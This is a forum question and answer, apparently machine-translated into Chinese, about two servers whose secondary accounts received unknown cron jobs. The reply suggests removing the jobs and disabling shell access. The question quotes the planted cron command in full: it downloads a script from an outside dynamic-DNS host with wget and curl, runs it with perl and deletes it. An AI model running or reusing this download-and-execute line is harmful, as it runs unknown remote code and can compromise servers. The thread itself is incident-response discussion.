我有两台专用服务器,几天前开始向我发送有关运行未知cron作业的通知。
在这两台服务器上,我都有我的网站的二级帐户,黑客修改了这些帐户的cron作业,而不是root。 所以我想“也许”他们只有有限的访问。
两者都试图运行以下内容:cd / tmp; wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt; rm -f abc *
第一台服务器的Cronjob输出:
http://pastebin.com/m56ga6pp
第二台服务器的Cronjob输出:
http://pastebin.com/4utZ8agC
奇怪的是,这两个服务器似乎同时被黑客攻击,并使用相同的方法。
有没有人有这种黑客,可以给我的想法,他是怎么进来的,如果我可以删除它不重新安装..?
在服务器上有很多网站,第一个使用大约500GB,需要很多移动别的地方,重新安装。
提前致谢!
从查看pastebin输出看来,cron作业试图产生散列,我怀疑这个人正尝试使用服务器作为encryption货币的采矿池的一部分。
有关他如何进入的详细信息,我们将需要各种日志,你是100%确定它不是网站的所有者谁做到了? 你可以很容易地删除cronjob。
crontab -e
为了防止人回来,我会禁止特定用户的shell访问,如果没有理由让他们拥有它。
chsh -s /sbin/nologin {username}